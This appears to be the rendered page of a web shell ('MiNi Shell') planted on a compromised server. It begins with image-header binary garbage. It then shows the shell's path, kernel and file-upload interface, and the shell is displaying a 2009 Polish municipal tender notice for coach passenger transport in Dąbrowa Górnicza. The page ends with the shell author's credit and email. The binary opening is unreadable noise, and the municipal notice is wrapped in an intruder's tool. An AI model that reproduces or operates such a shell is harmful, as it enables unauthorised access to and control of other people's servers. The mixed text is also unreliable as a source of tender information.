JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090310/57084-N-2009.html

<p class="kh_header"><b>Dąbrowa Górnicza: Transport drogowy w zakresie przewozu osób na terenie kraju</b><br>
<b>Numer ogłoszenia: 57084 - 2009; data zamieszczenia: 10.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2956700, faks 032 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Transport drogowy w zakresie przewozu osób na terenie kraju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Transport drogowy w zakresie przewozu osób na terenie kraju wg potrzeb Zamawiającego, zgodnie z wymogami niniejszej specyfikacji istotnych warunków zamówienia oraz projektem umowy - załącznik  nr 6 do SIWZ stanowiący jej integralną część.
2. Wykonanie usługi będzie odbywać się na terenie kraju.
3. Zamawiający zastrzega sobie prawo sprawdzenia trzeźwości Wykonawcy (kierowcy) oraz stanu technicznego pojazdów Wykonawcy wyłonionego w drodze niniejszego postępowania, każdorazowo po zgłoszeniu planowanego wyjazdu.
4. Zamawiający ustala, iż pierwsza godzina postoju będzie bezpłatna. 
5. Realizacja poszczególnych zleceń odbywać się będzie poprzez poinformowanie Wykonawcy drogą telefoniczną lub faksem przez Zamawiającego o terminie i miejscu transportu, w terminie nie krótszym niż:
a) 3 dni od zgłoszenia Wykonawcy w przypadku zamówienia dotyczącego autokaru powyżej 40 osób;
b) 1 dnia od zgłoszenia Wykonawcy w przypadku zamówienia dotyczącego autokaru do 20 osób.
6. Wykonawca zobowiązany będzie m.in.  do:
a) Odbierania osób z siedziby Zamawiającego lub innego wcześniej uzgodnionego miejsca  w wyznaczonym terminie
b) Przywiezienia osób do siedziby Zamawiającego lub innego wcześniej uzgodnionego miejsca 
c) W przypadku awarii pojazdu Wykonawca zobowiązany jest do niezwłocznego tj. najpóźniej w ciągu 1 godziny podstawienia pojazdu zastępczego o równorzędnym standardzie i ilości miejsc.
7. Zamawiający zobowiązuje się w przypadku wyjazdów dłuższych niż jeden dzień do zapewnienia bezpłatnego pobytu i posiłku dla Wykonawcy (kierowcy(-ów).
8. Stan techniczny pojazdów musi spełniać warunki dopuszczenia do ruchu drogowego, zgodne z obowiązującymi przepisami o transporcie drogowym.
9. Wykonawca zapewnia kierowcę/ów z prawem jazdy kategorii adekwatnej do rodzaju pojazdów, którym świadczona jest usługa (kategoria D)
10. Wymagane środki transportu jakimi musi dysponować Wykonawca to:
a) 3 autokary o liczbie miejsc siedzących powyżej 40 (oraz jeden zastępczy w przypadku awarii)
b) 2 autokary o liczbie miejsc siedzących do 20 (oraz jeden zastępczy w przypadku awarii)

11. Realizacja przedmiotu zamówienia będzie następować poprzez sukcesywne zlecenia Zamawiającego w zależności od zapotrzebowań zgłaszanych przez poszczególne wydziały-komórki równorzędne Urzędu Miejskiego.
12. Zamawiający zastrzega sobie prawo do zmniejszenia ilości i wielkości zamówienia. Uzgodniona wielkość zamówienia jest wielkością szacunkową i uzależniona będzie od faktycznych potrzeb Zamawiającego.
13. Ewentualne zmniejszenie ilości i wielkości zamówienia, nie spowoduje zmiany cen jednostkowych, jak równiej z tego powodu nie będą przysługiwały Wykonawcy żadne dodatkowe roszczenia 
w stosunku do Zamawiającego.

W ramach przedmiotu zamówienia oprócz sukcesywnych zleceń jw. Zamawiający zleci następujące zadania:
1. Zawody miejskie (Sprawni jak żołnierze) - ilość osób około 120 - trasa przejazdu - teren miasta Dąbrowa Górnicza - godziny przewozu osób 900 - 1400,
2. Zawody rejonowe (Sprawni jak żołnierze) - ilość osób około 120 - trasa przejazdu - teren miasta Dąbrowa Górnicza - godziny przewozu osób 900 - 1400,
3. W dniu 6 lub 20 czerwca 2009 roku - zawody sportowo pożarnicze - ilość osób około 20 - trasa przejazdu - Dąbrowa Górnicza Ząbkowice - stadion Unii Ząbkowice - godziny przewozu osób 900 - 1500.
4. Ponadto w zakresie przewozu uczniów i nauczycieli na warsztaty prowadzone na ścieżkach przyrodniczo - dydaktycznych.
 w miesiącach maj - czerwiec:
-Zespół Pałacowo - Parkowy w Kurozwękach k.Szydłowa;
-Ośrodek Edukacyjny Zespołu Parków Krajobrazowych w Kalinie woj. śląskie;
-Ośrodek Edukacyjny Zespołu Parków Krajobrazowych w Będzinie;
w miesiącach wrzesień-listopad:
-Ośrodek Dydaktyczno - Naukowy w Smoleniu;
-Park Krajobrazowy Cysterskie Kompozycje Krajobrazowe Rud Wielkich; 
-Park Krajobrazowy Cysterskie Kompozycje Krajobrazowe Rud Wielkich;
Łącznie: sześć wyjazdów po 40 osób;
5. Wynajęcie autokaru do przewozu 10-20 osób.
 Przewiduje się kilka wyjazdów komisji Rady Miejskiej na terenie Dąbrowy Górniczej oraz ew. 1-2 wyjazdy poza granice miasta.
6. Będzie miał miejsce także transport autokarowy w związku z organizowaniem Akcji Letniej - (LATO W MIEŚCIE 2009) zaangażowany w powyższą akcję będzie m.in. Wydział Zdrowia wspólnie z Miejską Biblioteką Publiczną w Dąbrowie Górniczej.
Ilość potrzebnych środków transportu - 8 autokarów, autokary na 45 osób, w tym: 
- w każdy czwartek lipca br. będzie organizowany 1 wyjazd autokarowy ( 4 autokary łącznie):
- Dąbrowa Górnicza - Chorzów ( Górnośląski Park Etnograficzny )
- Dąbrowa Górnicza - Pszczyna ( Zagroda Wsi Pszczyńskiej - skansen)
- Dąbrowa Górnicza - Tokarnia ( Muzeum Wsi Kieleckiej )
- Dąbrowa Górnicza - Wygiełzów  ( Nadwiślański Park Etnograficzny )
- Festyn w Błędowie  przewiduje się na dzień  30 lipca br. (3 autokary): 
- Biblioteka Główna  ul.Kościuszki 25 - Gołonóg Manhattan  ( przystanek autobusowy - ul. Wybickiego  ( przystanek autobusowy ) - Łęknice ( przystanek autobusowy) - Błędów.
- Mydlice (parking przy administracji ) - Biblioteka Główna ul. Kościuszki 25 - Reden (przystanek autobusowy  przy salonie Fiata ) - Kasprzaka  ( pawilon handlowy)- Błędów.
- Strzemieszyce (dworzec PKP ) - Tucznawa (remiza ) - Łosień  (szkoła) - Okradzionów (szkoła) - Błędów.
-  Wycieczka do Szkoły Policji w Katowicach w m-cu czerwcu 2009r. ( 1 autokar 45 osób ) Zespół Szkół Ogólnokształcących  nr 2, Dąbrowa Górnicza ul. Prusa 3
7. Odbędą się także przewozy osób w związku z organizowanymi imprezami sportowymi i kulturalnymi m.in.: 
- w lipcu 2009r -dwa dni:
- 1 dzień przejazd na trasie Sosnowiec-Kraków-OjcówWolbrom-Chlina
- 2 dzień przejazd na trasie Bydlin-Załęże-Udórz
- oraz we wrześniu przejazd na trasie Dąbrowa Górnicza-Katowice.

Wartość szacunkowa zamówienia w zakresie pkt. 1) do 7) wynosi 63.457,94 PLN netto..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.17.20.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1. Spełniają wymagania określone w art. 22 ust. 1 Ustawy i nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Ustawy.
2. Posiadają licencję, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjecie działalności gospodarczej w zakresie objętym zamówieniem publicznym tj. posiadają aktualną na czas trwania niniejszego zamówienia licencję na wykonywanie krajowego transportu drogowego osób, 
a w przypadku, gdy licencja nie obejmuje całego okresu objętego zamówieniem złożą oświadczenie, w którym zobowiązują się do jej przedłużenia na czas trwania umowy. Ww. licencja winna być wystawiona na Wykonawcę składającego ofertę.
3.W okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali, a w przypadku świadczeń okresowych lub ciągłych są w trakcie wykonywania, co najmniej 1 usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, której należyte wykonanie zostało potwierdzone przez poprzedniego Zamawiającego (min. 1 np. referencja). Przez usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia rozumieć należy usługę w zakresie transportu publicznego w tym: wycieczki, pielgrzymki, imprezy okolicznościowe itp., o wartości nie mniejszej niż 30.000,00 zł brutto, której należyte wykonanie zostało potwierdzone przez poprzedniego Zamawiającego.
4. Dysponują osobami zdolnymi do wykonania zadania stanowiącego przedmiot zamówienia i posiadającymi uprawnienia do prowadzenia pojazdów mechanicznych i przewozu osób na terenie kraju lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zadania tj. min. 5 osób, które posiadają prawo jazdy kategorii D.
5. Dysponują sprzętem niezbędnym do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia sprzętu wymaganego przez Zamawiającego, a niezbędnego do wykonania zadania tj.: 
a) Co najmniej 3 autokary o liczbie miejsc siedzących powyżej 40 (oraz jeden zastępczy w przypadku awarii)
b) Co najmniej 2 autokary - busy o liczbie miejsc siedzących do 20 (oraz jeden zastępczy w przypadku awarii)

Uwaga: Ocena spełniania warunków -udziału w postępowaniu (formalnych) i zdolności do wykonania zamówienia (merytorycznych) - wymaganych od Wykonawców będzie dokonane w oparciu o złożone wraz z ofertą: oświadczenia o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia publicznego oraz potwierdzające (spełnienie tych warunków) dokumenty - według formuły: -spełnia - nie spełnia-..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków, o których mowa w punkcie 10 SIWZ Wykonawca winien przedłożyć następujące dokumenty:
1.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Upoważnienie do podpisywania ofert i występowania w przetargu w imieniu Wykonawcy musi być dołączone do oferty lub musi bezpośrednio wynikać z przedmiotowych dokumentów. Gdy wykonawcę reprezentuje pełnomocnik do oferty musi być dołączone pełnomocnictwo posiadające   w formie oryginału bądź kserokopii poświadczonej notarialnie/.
2.Aktualna na czas trwania niniejszego zamówienia licencja na wykonywanie krajowego transportu drogowego osób, a w przypadku, gdy licencja nie obejmuje całego okresu objętego zamówieniem przedstawią oświadczenie w którym zobowiązują się do jej przedłużenia na czas trwania umowy - ( oświadczenie zawarte jest w treści załącznika nr 1 SIWZ -  Druk ofertowy pkt. 9).
3.Oświadczenie, że Wykonawca spełnia wymagania określone w art. 22 ust. 1 Ustawy i nie podleganiu wykluczeniu z postępowania na podst. art. 24 ust. 1 i 2  Ustawy  - załącznik nr 2 SIWZ - wskazana data podpisania oświadczenia. 
4.Wykaz osób którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia i posiadającymi uprawnienia do prowadzenia pojazdów mechanicznych i przewozu osób na terenie kraju tj. min 5 osób, które posiadają prawo jazdy kategorii D - załącznik nr 4 SIWZ - wskazana data podpisania.
5.Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonywania zamówienia, jeżeli w wykazie, o którym mowa w pkt 11.4, wykonawca wskazał osoby, którymi będzie dysponował, (ZAŁĄCZNIK NR 4a do SIWZ ) - wskazana data podpisania oświadczenia.
6.Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych, również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usłudze stanowiącej przedmiot   zamówienia z podaniem ich wartości,  przedmiotu, dat wykonania i odbiorców -  załącznik nr 3 SIWZ - wskazana data podpisania. Przez usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia rozumieć należy usługę w zakresie transportu publicznego w tym: wycieczki, pielgrzymki, imprezy okolicznościowe itp., o wartości nie mniejszej niż 30.000,00 zł brutto, której należyte wykonanie zostało potwierdzone przez poprzedniego zamawiającego, wykaz winien uwzględniać min. 1 usługę.
7.Dokument (min. 1 np. referencja) potwierdzająca, że usługa o której mowa w pkt. 11.5 SIWZ, została wykonana należycie.
8.Wykaz niezbędnych do wykonania zamówienia pojazdów, jakimi dysponuje lub będzie dysponował Wykonawca - załącznik nr 5 SIWZ wskazana data podpisania: 
1).	Co najmniej 3 autokary o liczbie miejsc siedzących powyżej 40 /oraz jeden zastępczy w przypadku awarii/
2).	Co najmniej 2 autokary/busy o liczbie miejsc siedzących do 20 /oraz jeden zastępczy w przypadku awarii/ 
9.	Pisemne zobowiązanie innych podmiotów do udostępnienia wykonawcy narzędzi i urządzeń (pojazdów) niezbędnych do wykonania zamówienia - (ZAŁĄCZNIK NR 5a do SIWZ ) - wskazana data podpisania oświadczenia.
Dodatkowo do oferty należy załączyć:
10.	Wypełniony Druk Ofertowy - załącznik nr 1 SIWZ - wskazana data podpisania. 
11.	Pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione, bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie, przedłożone w formie oryginału lub kopii poświadczonej przez notariusza.

Uwagi:
1. Złożone dokumenty winny być zgodne z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane ( Dz. U. nr 87 poz. 605 z późn. zm.).
2. Wykonawca składa oświadczenia i dokumenty przetargowe pod odpowiedzialnością karną /dotyczącą składania nieprawdziwych zeznań i oświadczeń/ wynikającą z art. 297 Kodeksu Karnego. W razie stwierdzenia, że złożone przez wykonawcę informacje są nieprawdziwe Zamawiający zgodnie z dyspozycją art. 304 k.p.k. - zawiadomi o tym fakcie właściwy organ ścigania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej ul. Graniczna 21, 41-300 Dąbrowa Górnicza
Wydział Kultury i Sportu pok. 301, piętro III.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2009 godzina 10:00, miejsce: Urząd Miejski w Dąbrowie Górniczej ul. Graniczna 21, 41-300 Dąbrowa Górnicza
stanowisko nr 13, parter - Biuro Obsługi Interesanta.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia
1.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia powinni spełniać warunki udziału w postępowaniu określone w punkcie 9 SIWZ oraz złożyć dokumenty potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w punkcie 10 SIWZ.
2.Dokumenty i oświadczenia wymagane w pkt 11.1 i 11.2 SIWZ Wykonawcy składają odrębnie, natomiast w pkt 11.4 do 11.9 SIWZ łącznie, oświadczenie, o którym mowa w pkt. 11.3 SIWZ winno zostać podpisane wspólnie /na jednym druku/ przez wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia.
3.Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być dołączone do oferty w formie oryginału lub kopii poświadczonej przez notariusza.
4.W tym celu niezbędne jest złożenie wraz z ofertą, przez wszystkich Wykonawców aktualnych odpisów z właściwego rejestru albo aktualnych zaświadczeń o wpisie do ewidencji działalności gospodarczej zawierających nazwiska osób uprawnionych do występowania w obrocie prawnym i reprezentowania firmy.
5.	Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem. 
6.	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia będą odpowiedzialni solidarnie za wypełnienie zobowiązań umownych.


II. W ramach kryterium Zamawiający będzie punktował: 
a)cena za 1 km przejazdu autokarem o liczbie miejsc siedzących powyżej 40	- 35%
b)cena za 1 km przejazdu autokarem o liczbie miejsc siedzących do 20 - 35%
c) cena za 1 godz. postoju autokaru o liczbie miejsc siedzących powyżej 
40 za każdą rozpoczętą godzinę postoju powyżej pierwszej godziny postoju 	- 15%

Creat By MiNi SheLL
Email: jattceo@gmail.com